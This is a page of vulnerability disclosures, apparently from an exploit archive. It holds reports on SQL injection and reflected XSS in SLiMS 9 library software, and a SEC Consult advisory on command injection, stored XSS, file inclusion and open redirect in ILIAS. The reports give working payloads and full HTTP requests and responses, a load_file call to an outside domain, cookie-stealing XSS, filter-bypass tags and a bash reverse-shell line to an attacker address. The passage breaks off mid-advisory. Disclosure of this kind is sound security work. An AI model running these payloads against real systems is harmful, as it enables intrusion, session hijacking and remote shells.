<pre><code>## Title: Senayan Library Management System v9.1.0 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.0/slims9_bulian-9.1.0.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin<br /><br />## Description:<br />The manual insertion `point 3` with the `class` parameter appears to<br />be vulnerable to SQL injection attacks.<br />A single quote was submitted in the manual insertion `point 3`, and a<br />general error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT<br />(CASE WHEN (8842=8842) THEN 0x626262622727 ELSE 0x28 END)) AND<br />'iuDJ'='iuDJ&membershipType=a''&collType=aaaa<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/qptgmu)<br /><br />## Time spent<br />`01:00:00`<br /><br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at<br />https://packetstormsecurity.com/https://cve.mitre.org/index.html and<br />https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi<br /><br />## Description:<br />The manual insertion `point 3` with `class` parameter appears to be<br />vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'<br />was submitted in the manual insertion point 3.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT<br />(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND<br />'dLjf'='dLjf&membershipType=a&collType=aaaa<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)<br /><br />## Proof and Exploit:<br />[href](http://localhost:5001/sy5wji)<br /><br />## Time spent<br />`03:00:00`<br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9<br />Multiple XSS-Reflected vulnerabilities<br />## Author: nu11secur1ty<br />## Date: 12.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0<br /><br />## Description:<br />The value of the keywords request parameter is copied into the value<br />of an HTML tag attribute which is encapsulated in double quotation<br />marks.<br />The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhc<br />was submitted in the keywords parameter.<br />This input was echoed unmodified in the application's response.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```GET<br />GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br /><br />```<br />[+] Response:<br /><br />```HTTP/1<br />HTTP/1.1 200 OK<br />Date: Fri, 09 Dec 2022 06:23:20 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Frame-Options: SAMEORIGIN<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 29492<br /><br /><!--<br /># ===============================<br /># Classic SLiMS Template<br /># ===============================<br /># @Author: Waris Agung Widodo<br /># @Email: ido.alit@gmail.com<br /># @Date: 2018-01-23T11:25:57+07:00<br /># @Last modified by: Waris Agung Widodo<br /># @Last modified time: 2019-01-03T11:25:57+07:00<br />--><br /><!DOCTYPE html><br /><html><br /><head><br /> <meta charset="utf-8"><br /> <title>Open Source Library Management System | Senayan</title><br /> <meta name="viewport" content="width=device-width,<br />initial-scale=1, shrink-to-fit=no"><br /><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><br /> <meta http-equiv="Pragma" content="no-cache"/><br /> <meta http-equiv="Cache-Control" content="no-store, no-cache,<br />must-revalidate, post-check=0, pre-check=0"/><br /> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/><br /><br /> <meta name="description" content="Open Source Library<br />Management System | Senayan"><br /> <meta name="keywords" content="Open Source Library Management System"><br /> <meta name="viewport" content="width=device-width,<br />height=device-height, initial-scale=1"><br /> <meta name="generator" content="SLiMS 9 (Bulian)"><br /> <meta name="theme-color" content="#000"><br /><br /> <meta property="og:locale" content="en_US"/><br /> <meta property="og:type" content="book"/><br /> <meta property="og:title" content="Open Source Library Management<br />System | Senayan"/><br /> <meta property="og:description" content="Open Source Library<br />Management System"/><br /> <meta property="og:url"<br />content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ac60v3)<br /><br />## Time spent<br />`01:00:00`<br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9<br />XSS-Reflected- PHPSESSID Hijacking<br />## Author: nu11secur1ty<br />## Date: 12.08.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://slims.web.id/web/news/rilis-9.4.0/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0<br /><br />## Description:<br />The value of the `destination` request parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks.<br />The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmygl<br />was submitted in the destination parameter.<br />This input was echoed unmodified in the application's response. The<br />attacker can hijack the session of some users of the system.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```GET<br />GET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m<br />Origin: http://pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=member<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />```<br />[+] Response:<br /><br />```HTTP/1<br />HTTP/1.1 200 OK<br />Date: Thu, 08 Dec 2022 18:43:20 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Frame-Options: SAMEORIGIN<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 30590<br /><br /><!--<br /># ===============================<br /># Classic SLiMS Template<br /># ===============================<br /># @Author: Waris Agung Widodo<br /># @Email: ido.alit@gmail.com<br /># @Date: 2018-01-23T11:25:57+07:00<br /># @Last modified by: Waris Agung Widodo<br /># @Last modified time: 2019-01-03T11:25:57+07:00<br />--><br /><!DOCTYPE html><br /><html><br /><head><br /> <meta charset="utf-8"><br /> <title>Open Source Library Management System | Senayan</title><br /> <meta name="viewport" content="width=device-width,<br />initial-scale=1, shrink-to-fit=no"><br /><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><br /> <meta http-equiv="Pragma" content="no-cache"/><br /> <meta http-equiv="Cache-Control" content="no-store, no-cache,<br />must-revalidate, post-check=0, pre-check=0"/><br /> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/><br /> <meta name="robots" content="noindex, follow"> <meta<br />name="description" content="Open Source Library Management System |<br />Senayan"><br /> <meta name="keywords" content="Open Source Library Management System"><br /> <meta name="viewport" content="width=device-width,<br />height=device-height, initial-scale=1"><br /> <meta name="generator" content="SLiMS 9 (Bulian)"><br /> <meta name="theme-color" content="#000"><br /><br /> <meta property="og:locale" content="en_US"/><br /> <meta property="og:type" content="book"/><br /> <meta property="og:title" content="Open Source Library Management<br />System | Senayan"/><br /> <meta property="og:description" content="Open Source Library<br />Management System"/><br /> <meta property="og:url"<br />content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/><br /> <meta property="og:site_name" content="Senayan"/><br /> <meta property="og:image"<br /> content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/><br /><br /> <meta name="twitter:card" content="summary"><br /> <meta name="twitter:url"<br />content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/><br /> <meta name="twitter:title" content="Open Source Library Management<br />System | Senayan"/><br /> <meta property="twitter:image"<br /> content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/><br /> <!-- // load bootstrap style --><br /> <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css"><br /> <!-- // font awesome --><br /> <link rel="stylesheet"<br />href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css"><br /> <!-- Tailwind CSS --><br /> <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css"><br /> <!-- Vegas CSS --><br /> <link rel="stylesheet"<br />href="template/default/assets/plugin/vegas/vegas.min.css"><br /> <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"<br />rel="stylesheet" type="text/css"/><br /> <!-- SLiMS CSS --><br /> <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css"><br /> <!-- // Flag css --><br /> <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css"><br /> <!-- // my custom style --><br /> <link rel="stylesheet"<br />href="template/default/assets/css/style.css?v=20221209-014320"><br /><br /> <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/><br /><br /> <!-- // load vue js --><br /> <script src="template/default/assets/js/vue.min.js"></script><br /> <!-- // load jquery library --><br /> <script src="template/default/assets/js/jquery.min.js"></script><br /> <!-- // load popper javascript --><br /> <script src="template/default/assets/js/popper.min.js"></script><br /> <!-- // load bootstrap javascript --><br /> <script src="template/default/assets/js/bootstrap.min.js"></script><br /> <!-- // load vegas javascript --><br /> <script src="template/default/assets/plugin/vegas/vegas.min.js"></script><br /> <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script><br /> <!-- // load SLiMS javascript --><br /> <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script><br /> <script src="/slims9_bulian-9.4.0/js/gui.js"></script><br /> <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script><br /><br /></head><br /><body class="bg-grey-lightest"><br /><br /><br /> <div class="result-search page-member-area"><br /> <section id="section1 container-fluid"><br /> <header class="c-header"><br /> <div class="mask"></div><br /><br /><nav class="navbar navbar-expand-lg navbar-dark bg-transparent"><br /> <a class="navbar-brand inline-flex items-center" href="index.php"><br /> <svg<br /> class="fill-current text-white inline-block h-8 w-8"<br /> version="1.1"<br /> xmlns="http://www.w3.org/2000/svg"<br />xmlns:xlink="http://www.w3.org/1999/xlink"<br /> viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"<br /> xml:space="preserve"><br /> <path<br />d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1<br /><br />l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2<br /><br />c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4<br /> C118.4,98.6,118.3,98.5,118.3,98.3z<br />M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6<br /><br />L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0<br /> c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z<br />M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/><br /> </svg><br /> <div class="inline-flex flex-col leading-tight ml-2"><br /> <h1 class="text-lg m-0 p-0">Senayan</h1><br /> </div><br /> </a><br /> <button class="navbar-toggler" type="button"<br />data-toggle="collapse" data-target="#navbarSupportedContent"<br /> aria-controls="navbarSupportedContent"<br />aria-expanded="false" aria-label="Toggle navigation"><br /> <span class="navbar-toggler-icon"></span><br /> </button><br /><br /> <div class="collapse navbar-collapse" id="navbarSupportedContent"><br /> <ul class="navbar-nav ml-auto"><br /> <li class="nav-item "><br /> <a class="nav-link" href="index.php">Home</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=libinfo">Information</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=news">News</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=help">Help</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=librarian">Librarian</a><br /></li> <li class="nav-item active"><br /> <a class="nav-link" href="index.php?p=member">Member Area</a><br /> </li><br /> <li class="nav-item dropdown"><br /> <a class="nav-link dropdown-toggle<br />cursor-pointer" type="button" id="languageMenuButton"<br /> data-toggle="dropdown" aria-haspopup="true"<br />aria-expanded="false"><br /> <span class="flag-icon flag-icon-us"<br />style="border-radius: 2px;"></span><br /> </a><br /> <div class="dropdown-menu bg-grey-lighter<br />dropdown-menu-lg-right" aria-labelledby="dropdownMenuButton"><br /> <h6 class="dropdown-header">Select Language : </h6><br /> <a class="dropdown-item"<br />href="index.php?select_lang=ar_SA"><br /> <span class="flag-icon flag-icon-sa mr-2"<br />style="border-radius: 2px;"></span> Arabic<br /> </a> <a class="dropdown-item" href="index.php?select_lang=bn_BD"><br /> <span class="flag-icon flag-icon-bd mr-2"<br />style="border-radius: 2px;"></span> Bengali<br /> </a> <a class="dropdown-item" href="index.php?select_lang=pt_BR"><br /> <span class="flag-icon flag-icon-br mr-2"<br />style="border-radius: 2px;"></span> Brazilian Portuguese<br /> </a> <a class="dropdown-item" href="index.php?select_lang=en_US"><br /> <span class="flag-icon flag-icon-us mr-2"<br />style="border-radius: 2px;"></span> English<br /> </a> <a class="dropdown-item" href="index.php?select_lang=es_ES"><br /> <span class="flag-icon flag-icon-es mr-2"<br />style="border-radius: 2px;"></span> Espanol<br /> </a> <a class="dropdown-item" href="index.php?select_lang=de_DE"><br /> <span class="flag-icon flag-icon-de mr-2"<br />style="border-radius: 2px;"></span> German<br /> </a> <a class="dropdown-item" href="index.php?select_lang=id_ID"><br /> <span class="flag-icon flag-icon-id mr-2"<br />style="border-radius: 2px;"></span> Indonesian<br /> </a> <a class="dropdown-item" href="index.php?select_lang=ja_JP"><br /> <span class="flag-icon flag-icon-jp mr-2"<br />style="border-radius: 2px;"></span> Japanese<br /> </a> <a class="dropdown-item" href="index.php?select_lang=my_MY"><br /> <span class="flag-icon flag-icon-my mr-2"<br />style="border-radius: 2px;"></span> Malay<br /> </a> <a class="dropdown-item" href="index.php?select_lang=fa_IR"><br /> <span class="flag-icon flag-icon-ir mr-2"<br />style="border-radius: 2px;"></span> Persian<br /> </a> <a class="dropdown-item" href="index.php?select_lang=ru_RU"><br /> <span class="flag-icon flag-icon-ru mr-2"<br />style="border-radius: 2px;"></span> Russian<br /> </a> <a class="dropdown-item" href="index.php?select_lang=th_TH"><br /> <span class="flag-icon flag-icon-th mr-2"<br />style="border-radius: 2px;"></span> Thai<br /> </a> <a class="dropdown-item" href="index.php?select_lang=tr_TR"><br /> <span class="flag-icon flag-icon-tr mr-2"<br />style="border-radius: 2px;"></span> Turkish<br /> </a> <a class="dropdown-item" href="index.php?select_lang=ur_PK"><br /> <span class="flag-icon flag-icon-pk mr-2"<br />style="border-radius: 2px;"></span> Urdu<br /> </a> </div><br /> </li><br /> </ul><br /> </div><br /></nav><br /> </header><br /> <div class="search" id="search-wraper"<br />xmlns:v-bind="http://www.w3.org/1999/xhtml"><br /> <div class="container"><br /> <div class="row"><br /> <div class="col-lg-8 mx-auto"><br /> <div class="card border-0 shadow"><br /> <div class="card-body"><br /> <form class="" action="index.php" method="get"<br />@submit.prevent="searchSubmit"><br /> <input type="hidden" name="search" value="search"><br /> <input ref="keywords" value=""<br />v-model.trim="keywords"<br /> @focus="searchOnFocus"<br />@blur="searchOnBlur" type="text" id="search-input"<br /> name="keywords"<br />class="input-transparent w-100" autocomplete="off"<br /> placeholder="Enter keyword to<br />search collection..."/><br /> </form><br /> </div><br /> </div><br /> <transition name="slide-fade"><br /> <div v-if="show" class="advanced-wraper shadow<br />mt-4" id="advanced-wraper"<br /> v-click-outside="hideSearch"><br /> <p class="label mb-2"><br /> Search by : <i<br />@click="hideSearch"<br /> class="far fa-times-circle float-right<br />text-danger cursor-pointer"></i><br /> </p><br /> <div class="d-flex flex-wrap"><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'keywords', 'btn-outline-secondary':<br />searchBy !== 'keywords' }"<br /> @click="searchOnClick('keywords')"<br />class="btn mr-2 mb-2">ALL</a><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'author', 'btn-outline-secondary': searchBy<br />!== 'author' }"<br /> @click="searchOnClick('author')"<br />class="btn mr-2 mb-2">Author</a><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'subject', 'btn-outline-secondary': searchBy<br />!== 'subject' }"<br /> @click="searchOnClick('subject')"<br />class="btn mr-2 mb-2">Subject</a><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy<br />!== 'isbn' }"<br /> @click="searchOnClick('isbn')"<br />class="btn mr-2 mb-2">ISBN/ISSN</a><br /> <button class="btn btn-light mr-2 mb-2"<br />disabled>OR TRY</button><br /> <a class="btn btn-outline-primary mr-2<br />mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a><br /> </div><br /> <p v-if="lastKeywords.length > 0" class="label<br />mt-4">Last search:</p><br /> <a<br />:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"<br /> class="flex items-center justify-between<br />py-1 text-decoration-none text-grey-darkest hover:text-blue"<br /> v-for="k in lastKeywords" :key="k"><span><i<br /> class="far fa-clock<br />text-grey-dark mr-2"></i><span class="italic<br />text-sm">{{tmpObj[k].text}}</span></span><i<br /> class="fas fa-angle-right<br />text-grey-dark"></i></a><br /> </div><br /> </transition><br /> </div><br /> </div><br /> </div><br /></div><br /> </section><br /><br /> <div class="container py-4"><br /> <div class="row"><br /> <div class="col-md-8"><br /> <div><br /> <div class="tagline">Library Member Login</div><br /> <div class="loginInfo">Please insert your member ID<br />and password given by library system administrator. If you are<br />library's member and don't have a password yet, please contact library<br />staff.</div><br /> <div class="loginInfo"><br /> <form<br />action="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"<br />method="post"><br /> <div class="fieldLabel">Member ID</div><br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/dsl863)<br /><br />## Time spent<br />`01:30:00`<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221206-0 ><br />=======================================================================<br /> title: Multiple critical vulnerabilities<br /> product: ILIAS eLearning platform<br /> vulnerable version: <= 7.15<br /> fixed version: 7.16<br /> CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,<br /> CVE-2022-45918<br /> impact: critical<br /> homepage: https://www.ilias.de<br /> found: 2022-09-30<br /> by: Anna Hartig (Office Bochum)<br /> Constantin Schwarz (Office Bochum)<br /> Niklas Schilling (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Around since 1998, ILIAS is a powerful learning management system that fulfills<br />all your requirements. Using its integrated tools, small and large businesses,<br />universities, schools and public authorities are able to create tailored,<br />individual learning scenarios."<br /><br />Source: https://www.ilias.de/en/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Direct OS Command Injection - CVE-2022-45915<br />ILIAS utilizes several third-party programs to perform tasks like creating PDF<br />files or scanning uploaded files for known viruses. These are called using the<br />PHP exec() function. In several instances, the arguments passed to the exec()<br />function contain user input that is not properly sanitized.<br />By performing malicious configuration steps or uploading dangerous files, an<br />attacker can execute arbitrary system commands with the rights of the web server<br />user (www-data).<br />The privilege required for the different instances of command injection range<br />from low rights to admin rights.<br /><br /><br />2) Stored Cross-Site Scripting - CVE-2022-45916<br />Multiple stored cross-site scripting vulnerabilities were identified in ILIAS<br />course items. These were either achieved by bypassing existing XSS filters or<br />simply by exploiting missing input validation altogether. This results in the<br />execution of attacker-controlled JavaScript code by the user's browser.<br />The attacker requires the right to create course items, e.g., as a tutor of a<br />course.<br /><br /><br />3) Local File Inclusion - CVE-2022-45918<br />The included SCORM editor features a debugger that gives authors insights into<br />the current SCORM player session, as well as previous sessions. When accessing<br />the logs of previous sessions, the debugger fails to validate the requested<br />file path, allowing for arbitrary filesystem access.<br /><br /><br />4) Open Redirect - CVE-2022-45917<br />The function shib_logout.php redirects the user to a URL specified in the<br />"return" parameter. Since this parameter is not validated, an attacker can use<br />it to redirect a victim to an arbitrary website. This is a powerful tool in<br />phishing campaigns, as it allows hiding the malicious webpage behind a link that<br />looks like it would take you to the real ILIAS webpage.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Direct OS Command Injection - CVE-2022-45915<br />Multiple instances of command injection vulnerabilities were identified:<br /><br />a) ZIP archive upload<br />Normal users with open assessments can submit their solution by uploading a ZIP<br />archive. These archives are extracted on the server and scanned for viruses<br />recursively. The directory and file names can be used by an attacker to inject<br />system commands, e.g., by including a directory with the name<br />$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker<br />is able to get a reverse shell on the ILIAS webserver with the rights of the<br />web server user (www-data).<br /><br /><br />b) Media object creation<br />ILIAS can be configured so that users can create media objects based on files<br />inside an "Upload Directory". Before these objects are created, the files are<br />scanned for viruses. The file names can be used by an attacker to inject system<br />commands. By placing a file with a name like $(touch /tmp/pwned) inside the<br />upload directory and then creating a media object based on it, an attacker is<br />able to execute arbitrary system commands with the rights of www-data on the<br />server.<br /><br /><br />c) PDF document creation<br />ILIAS provides users the functionality to export content as PDF files. A user<br />with admin rights can configure the path to the preferred PDF renderer. An<br />attacker can use this parameter to inject system commands. Due to missing<br />input validation it is possible to inject multiple commands. The path to<br />wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By<br />changing the path to:<br /><br />/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";<br /><br />an attacker can open a reverse shell with the rights of www-data that connects<br />to the attacker's machine on port 13373. The reverse shell is initiated when<br />the export function is triggered.<br />No PDF renderer has to be installed for this vulnerability to be exploitable.<br /><br /><br />2) Stored Cross-Site Scripting - CVE-2022-45916<br />Multiple instances of stored cross-site scripting were identified:<br /><br />a) Several Stored XSS Attacks in Tests<br />An attacker must be able to create new tests in which the JavaScript code will<br />be embedded. If a victim then later accesses one of those tests, the XSS payload will<br />be triggered. The "Question" input field of a test has a filter in place, which<br />correctly removes HTML tags such as <script> or<br /><img src="x" onerror="alert(document.cookie)">. By making use of half open HTML<br />tags, this filter can be successfully bypassed. E.g.<br /><br /><img src="x" onerror="alert(document.cookie)"<br /><br />This half open HTML tag can also be used in the "Introductory Message" of a test<br />to trigger an XSS. It's important to end the JavaScript code with a quotation<br />mark or space, to properly separate it from successive HTML tags, after it's<br />embedded into a test.<br /><br />Finally, the "Question" input field of the question type "Long Menu" was<br />identified to use no filtering at all, resulting in the unrestricted use of<br />arbitrary HTML tags such as <script>.<br /><br /><br />b) Stored XSS in title of course items<br />An attacker with rights to create an arbitrary course item can conduct a stored<br />XSS attack by setting the title of the element to:<br /><br />" onclick="alert(document.cookie)"<br /><br />When a user clicks on the button to the right of the title, the XSS payload is<br />triggered.<br /><br /><br />c) Stored XSS in HTML sites<br />An attacker with rights to edit an HTML Learning Module can conduct a stored<br />XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even<br />if this behavior is intended, it is insecure and considered bad practice.<br /><br /><br />3) Local File Inclusion - CVE-2022-45918<br />As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS<br />platform. An attacker with access to a SCORM player can open the SCORM<br />debugger and request the logs of a previous session. By 